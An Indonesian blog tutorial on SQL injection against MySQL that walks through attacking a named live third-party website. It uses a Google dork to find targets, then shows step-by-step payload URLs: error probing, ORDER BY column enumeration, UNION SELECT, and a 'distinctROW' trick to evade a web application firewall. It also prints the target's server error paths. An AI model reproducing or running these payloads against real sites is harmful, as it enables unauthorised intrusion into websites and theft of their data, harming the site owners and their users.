Unggulan
- Dapatkan link
- X
- Aplikasi Lainnya
Tutorial SQL Injection part 1 (dbms MySQL)
Halo guys kembali di situs uchiha obITo
Masih seputar SQL Injection
Kalian perlu 2 aplikasi ini guys :
1. Web browser + google
2. SQLMAP (CLI) (opsional)
3. DH Hackbar (GUI) (opsional)
Okey seperti biasa saya sudah ada live target, dan saya akan menjelaskan mulai dari 0 yah :)
Step Pertama :
1. Siapkan Dork SQL Injection, apa itu dork?
klik disini
2. Oke sebagai contoh disini saya pakai dork
"inurl:product.php?id= site:.in". Dan kalian harus tau, untuk menggunakan dork hanya bisa dilakukan pada search engine Google.
3. ini live target (sasaran) :https://ensis.in/product.php?prid=62
Tampilannya seperti ini gengs
Page masih terlihat normal kan?
Terjadi error ya guys muncul pesan seperti ini " Warning: mysqli_fetch_array() expects parameter 1 to be mysqli_result, bool given in /home/dhipltbr/ensis.in/product.php on line 9
Warning: mysqli_fetch_array() expects parameter 1 to be mysqli_result, bool given in /home/dhipltbr/ensis.in/product.php on line 11
Warning: mysqli_fetch_array() expects parameter 1 to be mysqli_result, bool given in /home/dhipltbr/ensis.in/product.php on line 13".
4. Step ke empat yaitu kita test lagi situs tersebut dengan url balancing (--+-,--,'--+-), contoh : https://ensis.in/product.php?prid=62'--+-
Kalau page kembali normal seperti dibawah bisa dipastikan vuln SQL injection ya guys ya 😂.
Contoh :
https://ensis.in/product.php?prid=62+order+by+1--+- (page normal)
https://ensis.in/product.php?prid=62+order+by+2--+-(page normal)
https://ensis.in/product.php?prid=62+order+by+3--+-(page normal)
https://ensis.in/product.php?prid=62+order+by+4--+- (page normal)
https://ensis.in/product.php?prid=62+order+by+5--+- (page normal)
https://ensis.in/product.php?prid=62+order+by+6--+- (page normal)
https://ensis.in/product.php?prid=62+order+by+7--+- (page normal)
https://ensis.in/product.php?prid=62+order+by+8--+- (page error')
Nah, sekarang kita udah tau ya, ternyata di kolom ke delapan 8 terjadi error yang artinya kolom tersebut hanya mencapai 7.
6. Step keenam yaitu kita mencoba union select statement (+union+select+).
contoh : https://ensis.in/product.php?prid=.62'+union+select+1,2,3,4,5,6,7--+-
Kalian teliti ya ikuti contohnya okey
Nah tampil page seperti ini forbidden
Jangan khawatir, ini bisa kita bypass kok berdasarkan owasp.org disini kita bisa membypassnya dengan distinctROW.Contoh : https://ensis.in/product.php?prid=.62'+union+distinctROW+select+1,2,3,4,5,6,7--+-
Nanti muncul page error' seperti dibawah ini,
Lah?! Bang Tobi!!. Kok ga muncul angka togelnya??, Tenang ternyata angka togelnya itu berupa url gambar tersebut coba deh kamu tekan lama gambar yang error' tersebut ntar seperti dibawah ini :
ada angka apa aja?, Ada 3, 2, dan 4 yah.
- Dapatkan link
- X
- Aplikasi Lainnya
Disarankan untuk anda
Bagaiamana-seorang-peretas-mendapatkan-penghasilan-PART-1
- Dapatkan link
- X
- Aplikasi Lainnya
Komentar
Posting Komentar